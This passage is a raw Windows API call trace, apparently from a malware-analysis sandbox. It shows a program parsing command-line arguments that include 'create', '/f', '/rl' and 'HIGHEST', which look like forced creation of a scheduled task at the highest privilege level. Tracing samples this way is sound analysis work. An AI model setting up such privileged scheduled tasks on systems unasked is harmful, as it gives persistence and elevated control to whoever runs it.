_Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0176.794] lstrlenW (lpString="|ri|") returned 4 [0176.794] lstrlenW (lpString="|rl|") returned 4 [0176.794] StrStrIW (lpFirst="|ri|", lpSrch="|rl|") returned 0x0 [0176.794] RtlRestoreLastWin32Error () returned 0x490 [0176.795] lstrlenW (lpString="z") returned 1 [0176.795] lstrlenW (lpString="z") returned 1 [0176.795] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.795] lstrlenW (lpString="rl") returned 2 [0176.795] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.795] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|z|") returned 3 [0176.795] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0176.795] lstrlenW (lpString="|z|") returned 3 [0176.795] lstrlenW (lpString="|rl|") returned 4 [0176.795] RtlRestoreLastWin32Error () returned 0x490 [0176.795] lstrlenW (lpString="f") returned 1 [0176.795] lstrlenW (lpString="f") returned 1 [0176.795] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.795] lstrlenW (lpString="rl") returned 2 [0176.795] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.795] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0176.795] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0176.795] lstrlenW (lpString="|f|") returned 3 [0176.796] lstrlenW (lpString="|rl|") returned 4 [0176.796] RtlRestoreLastWin32Error () returned 0x490 [0176.796] lstrlenW (lpString="v1") returned 2 [0176.796] lstrlenW (lpString="v1") returned 2 [0176.796] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.796] lstrlenW (lpString="rl") returned 2 [0176.796] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.796] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|v1|") returned 4 [0176.796] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0176.796] lstrlenW (lpString="|v1|") returned 4 [0176.796] lstrlenW (lpString="|rl|") returned 4 [0176.796] StrStrIW (lpFirst="|v1|", lpSrch="|rl|") returned 0x0 [0176.796] RtlRestoreLastWin32Error () returned 0x490 [0176.796] lstrlenW (lpString="xml") returned 3 [0176.796] lstrlenW (lpString="xml") returned 3 [0176.796] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.796] lstrlenW (lpString="rl") returned 2 [0176.796] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.797] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|xml|") returned 5 [0176.797] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0176.797] lstrlenW (lpString="|xml|") returned 5 [0176.797] lstrlenW (lpString="|rl|") returned 4 [0176.797] StrStrIW (lpFirst="|xml|", lpSrch="|rl|") returned 0x0 [0176.797] RtlRestoreLastWin32Error () returned 0x490 [0176.797] lstrlenW (lpString="ec") returned 2 [0176.797] lstrlenW (lpString="ec") returned 2 [0176.797] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.797] lstrlenW (lpString="rl") returned 2 [0176.797] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.797] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ec|") returned 4 [0176.797] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0176.797] lstrlenW (lpString="|ec|") returned 4 [0176.797] lstrlenW (lpString="|rl|") returned 4 [0176.797] StrStrIW (lpFirst="|ec|", lpSrch="|rl|") returned 0x0 [0176.797] RtlRestoreLastWin32Error () returned 0x490 [0176.797] lstrlenW (lpString="rl") returned 2 [0176.797] lstrlenW (lpString="rl") returned 2 [0176.797] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.798] lstrlenW (lpString="rl") returned 2 [0176.798] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.798] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0176.798] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0176.798] lstrlenW (lpString="|rl|") returned 4 [0176.798] lstrlenW (lpString="|rl|") returned 4 [0176.798] StrStrIW (lpFirst="|rl|", lpSrch="|rl|") returned="|rl|" [0176.798] RtlRestoreLastWin32Error () returned 0x0 [0176.798] RtlRestoreLastWin32Error () returned 0x0 [0176.798] lstrlenW (lpString="HIGHEST") returned 7 [0176.798] lstrlenW (lpString="-/") returned 2 [0176.798] StrChrIW (lpStart="-/", wMatch=0x300048) returned 0x0 [0176.798] RtlRestoreLastWin32Error () returned 0x490 [0176.798] RtlRestoreLastWin32Error () returned 0x490 [0176.798] RtlRestoreLastWin32Error () returned 0x0 [0176.798] lstrlenW (lpString="HIGHEST") returned 7 [0176.798] StrChrIW (lpStart="HIGHEST", wMatch=0x3a) returned 0x0 [0176.798] RtlRestoreLastWin32Error () returned 0x490 [0176.798] RtlRestoreLastWin32Error () returned 0x0 [0176.798] _memicmp (_Buf1=0x47cac48, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.798] lstrlenW (lpString="HIGHEST") returned 7 [0176.798] lstrlenW (lpString="HIGHEST") returned 7 [0176.798] lstrlenW (lpString=" \x09") returned 2 [0176.798] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0176.798] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0176.799] StrChrW (lpStart=" \x09", wMatch=0x49) returned 0x0 [0176.799] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0176.799] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0176.799] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0176.799] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0176.799] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0176.799] GetLastError () returned 0x0 [0176.799] lstrlenW (lpString="HIGHEST") returned 7 [0176.799] lstrlenW (lpString="HIGHEST") returned 7 [0176.799] RtlRestoreLastWin32Error () returned 0x0 [0176.799] RtlRestoreLastWin32Error () returned 0x0 [0176.799] lstrlenW (lpString="/f") returned 2 [0176.799] lstrlenW (lpString="-/") returned 2 [0176.799] StrChrIW (lpStart="-/", wMatch=0x30002f) returned="/" [0176.799] lstrlenW (lpString="create") returned 6 [0176.799] lstrlenW (lpString="create") returned 6 [0176.799] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.799] lstrlenW (lpString="f") returned 1 [0176.799] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.799] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8 [0176.799] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0176.800] lstrlenW (lpString="|create|") returned 8 [0176.800] lstrlenW (lpString="|f|") returned 3 [0176.800] StrStrIW (lpFirst="|create|", lpSrch="|f|") returned 0x0 [0176.800] RtlRestoreLastWin32Error () returned 0x490 [0176.800] lstrlenW (lpString="?") returned 1 [0176.800] lstrlenW (lpString="?") returned 1 [0176.800] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.800] lstrlenW (lpString="f") returned 1 [0176.800] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.800] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|?|") returned 3 [0176.800] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0176.800] lstrlenW (lpString="|?|") returned 3 [0176.800] lstrlenW (lpString="|f|") returned 3 [0176.800] StrStrIW (lpFirst="|?|", lpSrch="|f|") returned 0x0 [0176.800] RtlRestoreLastWin32Error () returned 0x490 [0176.800] lstrlenW (lpString="s") returned 1 [0176.801] lstrlenW (lpString="s") returned 1 [0176.801] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.801] lstrlenW (lpString="f") returned 1 [0176.801] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.801] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|s|") returned 3 [0176.801] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0176.801] lstrlenW (lpString="|s|") returned 3 [0176.801] lstrlenW (lpString="|f|") returned 3 [0176.801] StrStrIW (lpFirst="|s|", lpSrch="|f|") returned 0x0 [0176.801] RtlRestoreLastWin32Error () returned 0x490 [0176.801] lstrlenW (lpString="u") returned 1 [0176.801] lstrlenW (lpString="u") returned 1 [0176.801] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.801] lstrlenW (lpString="f") returned 1 [0176.801] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.801] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|u|") returned 3 [0176.801] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0176.801] lstrlenW (lpString="|u|") returned 3 [0176.801] lstrlenW (lpString="|f|") returned 3 [0176.801] StrStrIW (lpFirst="|u|", lpSrch="|f|") returned 0x0 [0176.801] RtlRestoreLastWin32Error () returned 0x490 [0176.801] lstrlenW (lpString="p") returned 1 [0176.801] lstrlenW (lpString="p") returned 1 [0176.801] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.801] lstrlenW (lpString="f") returned 1 [0176.802] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.802] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|p|") returned 3 [0176.802] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0176.802] lstrlenW (lpString="|p|") returned 3 [0176.802] lstrlenW (lpString="|f|") returned 3 [0176.802] StrStrIW (lpFirst="|p|", lpSrch="|f|") returned 0x0 [0176.802] RtlRestoreLastWin32Error () returned 0x490 [0176.802] lstrlenW (lpString="ru") returned 2 [0176.802] lstrlenW (lpString="ru") returned 2 [0176.802] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.802] lstrlenW (lpString="f") returned 1 [0176.802] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.802] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ru|") returned 4 [0176.802] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0176.802] lstrlenW (lpString="|ru|") returned 4 [0176.802] lstrlenW (lpString="|f|") returned 3 [0176.841] StrStrIW (lpFirst="|ru|", lpSrch="|f|") returned 0x0 [0176.842] RtlRestoreLastWin32Error () returned 0x490 [0176.842] lstrlenW (lpString="rp") returned 2 [0176.842] lstrlenW (lpString="rp") returned 2 [0176.842] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.842] lstrlenW (lpString="f") returned 1 [0176.842] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.842] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rp|") returned 4 [0176.842] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0176.842] lstrlenW (lpString="|rp|") returned 4 [0176.842] lstrlenW (lpString="|f|") returned 3 [0176.842] StrStrIW (lpFirst="|rp|", lpSrch="|f|") returned 0x0 [0176.842] RtlRestoreLastWin32Error () returned 0x490 [0176.842] lstrlenW (lpString="sc") returned 2 [0176.842] lstrlenW (lpString="sc") returned 2 [0176.842] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.842] lstrlenW (lpString="f") returned 1 [0176.842] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.842] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0176.842] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0176.842] lstrlenW (lpString="|sc|") returned 4 [0176.842] lstrlenW (lpString="|f|") returned 3 [0176.843] StrStrIW (lpFirst="|sc|", lpSrch="|f|") returned 0x0 [0176.843] RtlRestoreLastWin32Error () returned 0x490 [0176.843] lstrlenW (lpString="mo") returned 2 [0176.843] lstrlenW (lpString="mo") returned 2 [0176.843] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.843] lstrlenW (lpString="f") returned 1 [0176.843] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.843] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|mo|") returned 4 [0176.843] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0176.843] lstrlenW (lpString="|mo|") returned 4 [0176.843] lstrlenW (lpString="|f|") returned 3 [0176.843] StrStrIW (lpFirst="|mo|", lpSrch="|f|") returned 0x0 [0176.843] RtlRestoreLastWin32Error () returned 0x490 [0176.843] lstrlenW (lpString="d") returned 1 [0176.843] lstrlenW (lpString="d") returned 1 [0176.843] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.843] lstrlenW (lpString="f") returned 1 [0176.843] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.843] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|d|") returned 3 [0176.843] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0176.843] lstrlenW (lpString="|d|") returned 3 [0176.843] lstrlenW (lpString="|f|") returned 3 [0176.843] StrStrIW (lpFirst="|d|", lpSrch="|f|") returned 0x0 [0176.843] RtlRestoreLastWin32Error () returned 0x490 [0176.843] lstrlenW (lpString="m") returned 1 [0176.844] lstrlenW (lpString="m") returned 1 [0176.844] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.844] lstrlenW (lpString="f") returned 1 [0176.844] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.844] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|m|") returned 3 [0176.844] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0176.844] lstrlenW (lpString="|m|") returned 3 [0176.844] lstrlenW (lpString="|f|") returned 3 [0176.844] StrStrIW (lpFirst="|m|", lpSrch="|f|") returned 0x0 [0176.844] RtlRestoreLastWin32Error () returned 0x490 [0176.844] lstrlenW (lpString="i") returned 1 [0176.844] lstrlenW (lpString="i") returned 1 [0176.844] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.844] lstrlenW (lpString="f") returned 1 [0176.844] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.844] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|i|") returned 3 [0176.844] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0176.844] lstrlenW (lpString="|i|") returned 3 [0176.844] lstrlenW (lpString="|f|") returned 3 [0176.844] StrStrIW (lpFirst="|i|", lpSrch="|f|") returned 0x0 [0176.844] RtlRestoreLastWin32Error () returned 0x490 [0176.844] lstrlenW (lpString="tn") returned 2 [0176.844] lstrlenW (lpString="tn") returned 2 [0176.844] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.845] lstrlenW (lpString="f") returned 1 [0176.845] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.845] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0176.845] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0176.845] lstrlenW (lpString="|tn|") returned 4 [0176.845] lstrlenW (lpString="|f|") returned 3 [0176.845] StrStrIW (lpFirst="|tn|", lpSrch="|f|") returned 0x0 [0176.845] RtlRestoreLastWin32Error () returned 0x490 [0176.845] lstrlenW (lpString="tr") returned 2 [0176.845] lstrlenW (lpString="tr") returned 2 [0176.845] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.845] lstrlenW (lpString="f") returned 1 [0176.845] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.845] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0176.845] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0176.845] lstrlenW (lpString="|tr|") returned 4 [0176.845] lstrlenW (lpString="|f|") returned 3 [0176.845] StrStrIW (lpFirst="|tr|", lpSrch="|f|") returned 0x0 [0176.845] RtlRestoreLastWin32Error () returned 0x490 [0176.845] lstrlenW (lpString="st") returned 2 [0176.845] lstrlenW (lpString="st") returned 2 [0176.845] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.845] lstrlenW (lpString="f") returned 1 [0176.845] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.846] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|st|") returned 4 [0176.846] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0176.846] lstrlenW (lpString="|st|") returned 4 [0176.846] lstrlenW (lpString="|f|") returned 3 [0176.846] StrStrIW (lpFirst="|st|", lpSrch="|f|") returned 0x0 [0176.846] RtlRestoreLastWin32Error () returned 0x490 [0176.846] lstrlenW (lpString="sd") returned 2 [0176.846] lstrlenW (lpString="sd") returned 2 [0176.846] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.846] lstrlenW (lpString="f") returned 1 [0176.846] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.846] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sd|") returned 4 [0176.846] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0176.846] lstrlenW (lpString="|sd|") returned 4 [0176.846] lstrlenW (lpString="|f|") returned 3 [0176.846] StrStrIW (lpFirst="|sd|", lpSrch="|f|") returned 0x0 [0176.846] RtlRestoreLastWin32Error () returned 0x490 [0176.846] lstrlenW (lpString="ed") returned 2 [0176.846] lstrlenW (lpString="ed") returned 2 [0176.846] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.846] lstrlenW (lpString="f") returned 1 [0176.847] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.848] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ed|") returned 4 [0176.848] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0176.848] lstrlenW (lpString="|ed|") returned 4 [0176.848] lstrlenW (lpString="|f|") returned 3 [0176.848] StrStrIW (lpFirst="|ed|", lpSrch="|f|") returned 0x0 [0176.848] RtlRestoreLastWin32Error () returned 0x490 [0176.848] lstrlenW (lpString="it") returned 2 [0176.848] lstrlenW (lpString="it") returned 2 [0176.848] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.848] lstrlenW (lpString="f") returned 1 [0176.848] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.848] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|it|") returned 4 [0176.848] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0176.848] lstrlenW (lpString="|it|") returned 4 [0176.848] lstrlenW (lpString="|f|") returned 3 [0176.848] StrStrIW (lpFirst="|it|", lpSrch="|f|") returned 0x0 [0176.848] RtlRestoreLastWin32Error () returned 0x490 [0176.848] lstrlenW (lpString="et") returned 2 [0176.848] lstrlenW (lpString="et") returned 2 [0176.848] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.848] lstrlenW (lpString="f") returned 1 [0176.849] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.849] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|et|") returned 4 [0176.849] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0176.849] lstrlenW (lpString="|et|") returned 4 [0176.849] lstrlenW (lpString="|f|") returned 3 [0176.849] StrStrIW (lpFirst="|et|", lpSrch="|f|") returned 0x0 [0176.849] RtlRestoreLastWin32Error () returned 0x490 [0176.849] lstrlenW (lpString="k") returned 1 [0176.849] lstrlenW (lpString="k") returned 1 [0176.849] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.849] lstrlenW (lpString="f") returned 1 [0176.849] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.849] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|k|") returned 3 [0176.849] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0176.849] lstrlenW (lpString="|k|") returned 3 [0176.849] lstrlenW (lpString="|f|") returned 3 [0176.849] StrStrIW (lpFirst="|k|", lpSrch="|f|") returned 0x0 [0176.849] RtlRestoreLastWin32Error () returned 0x490 [0176.849] lstrlenW (lpString="du") returned 2 [0176.849] lstrlenW (lpString="du") returned 2 [0176.849] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.849] lstrlenW (lpString="f") returned 1 [0176.849] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.849] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|du|") returned 4 [0176.849] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0176.849] lstrlenW (lpString="|du|") returned 4 [0176.850] lstrlenW (lpString="|f|") returned 3 [0176.850] StrStrIW (lpFirst="|du|", lpSrch="|f|") returned 0x0 [0176.850] RtlRestoreLastWin32Error () returned 0x490 [0176.850] lstrlenW (lpString="ri") returned 2 [0176.850] lstrlenW (lpString="ri") returned 2 [0176.850] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.850] lstrlenW (lpString="f") returned 1 [0176.850] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.850] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ri|") returned 4 [0176.850] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0176.850] lstrlenW (lpString="|ri|") returned 4 [0176.850] lstrlenW (lpString="|f|") returned 3 [0176.850] StrStrIW (lpFirst="|ri|", lpSrch="|f|") returned 0x0 [0176.850] RtlRestoreLastWin32Error () returned 0x490 [0176.850] lstrlenW (lpString="z") returned 1 [0176.850] lstrlenW (lpString="z") returned 1 [0176.850] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.850] lstrlenW (lpString="f") returned 1 [0176.850] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.850] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|z|") returned 3 [0176.850] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0176.850] lstrlenW (lpString="|z|") returned 3 [0176.850] lstrlenW (lpString="|f|") returned 3 [0176.851] StrStrIW (lpFirst="|z|", lpSrch="|f|") returned 0x0 [0176.851] RtlRestoreLastWin32Error () returned 0x490 [0176.851] lstrlenW (lpString="f") returned 1 [0176.851] lstrlenW (lpString="f") returned 1 [0176.851] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.851] lstrlenW (lpString="f") returned 1 [0176.851] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.851] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0176.851] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0176.851] lstrlenW (lpString="|f|") returned 3 [0176.851] lstrlenW (lpString="|f|") returned 3 [0176.851] StrStrIW (lpFirst="|f|", lpSrch="|f|") returned="|f|" [0176.851] RtlRestoreLastWin32Error () returned 0x0 [0176.851] RtlRestoreLastWin32Error () returned 0x0 [0176.851] GetProcessHeap () returned 0x47c0000 [0176.851] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, 